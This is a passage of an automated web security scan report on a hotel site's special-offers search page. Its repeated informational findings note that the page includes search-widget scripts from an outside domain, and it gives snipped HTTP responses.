Date: Thu, 21 Oct 2010 02:23:04 GMT
Content-Length: 151002

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232101843636250" type="text/javascript"></script>
...[SNIP]...

5.156. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110470980000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:37:26 GMT
Content-Length: 151064

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110470980000" type="text/javascript"></script>
...[SNIP]...

5.157. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113005667500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:41:40 GMT
Content-Length: 151036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113005667500" type="text/javascript"></script>
...[SNIP]...

5.158. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108650980000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:34:25 GMT
Content-Length: 151202

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108650980000" type="text/javascript"></script>
...[SNIP]...

5.159. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116347855000

Request

GET /summit/special_offers/special_search_results.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.sterlinghotels.com
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; ASP.NET_SessionId=hcbf1efvrdp3ct45ry3y3uaw
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:47:14 GMT
Content-Length: 388530

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116347855000" type="text/javascript"></script>
...[SNIP]...

5.160. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232114662855000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:44:25 GMT
Content-Length: 150226

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232114662855000" type="text/javascript"></script>
...[SNIP]...

5.161. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111176761250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:38:36 GMT
Content-Length: 150972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111176761250" type="text/javascript"></script>
...[SNIP]...

5.162. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232098807855000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:18:00 GMT
Content-Length: 296073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232098807855000" type="text/javascript"></script>
...[SNIP]...

5.163. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110588636250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:37:38 GMT
Content-Length: 151036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110588636250" type="text/javascript"></script>
...[SNIP]...

5.164. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108660042500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:34:25 GMT
Content-Length: 150972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108660042500" type="text/javascript"></script>
...[SNIP]...

5.165. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108470667500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:34:06 GMT
Content-Length: 151030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108470667500" type="text/javascript"></script>
...[SNIP]...

5.166. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109428636250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:35:42 GMT
Content-Length: 151007

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109428636250" type="text/javascript"></script>
...[SNIP]...

5.167. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112819105000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:41:21 GMT
Content-Length: 150972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112819105000" type="text/javascript"></script>
...[SNIP]...

5.168. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232715384886250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 19:25:37 GMT
Content-Length: 296073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232715384886250" type="text/javascript"></script>
...[SNIP]...

5.169. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232099265511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:18:46 GMT
Content-Length: 296073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232099265511250" type="text/javascript"></script>
...[SNIP]...

5.170. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113165198750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:41:56 GMT
Content-Length: 151007

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113165198750" type="text/javascript"></script>
...[SNIP]...

5.171. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111552698750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:14 GMT
Content-Length: 151008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111552698750" type="text/javascript"></script>
...[SNIP]...

5.172. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116186761250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:46:58 GMT
Content-Length: 296135

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116186761250" type="text/javascript"></script>
...[SNIP]...

5.173. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110195198750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:36:59 GMT
Content-Length: 151007

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110195198750" type="text/javascript"></script>
...[SNIP]...

5.174. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112001761250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:59 GMT
Content-Length: 151028

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112001761250" type="text/javascript"></script>
...[SNIP]...

5.175. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232105981136250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:29:57 GMT
Content-Length: 151030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232105981136250" type="text/javascript"></script>
...[SNIP]...

5.176. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109070667500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:35:06 GMT
Content-Length: 151023

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109070667500" type="text/javascript"></script>
...[SNIP]...

5.177. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110150980000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:36:55 GMT
Content-Length: 151030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110150980000" type="text/javascript"></script>
...[SNIP]...

5.178. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
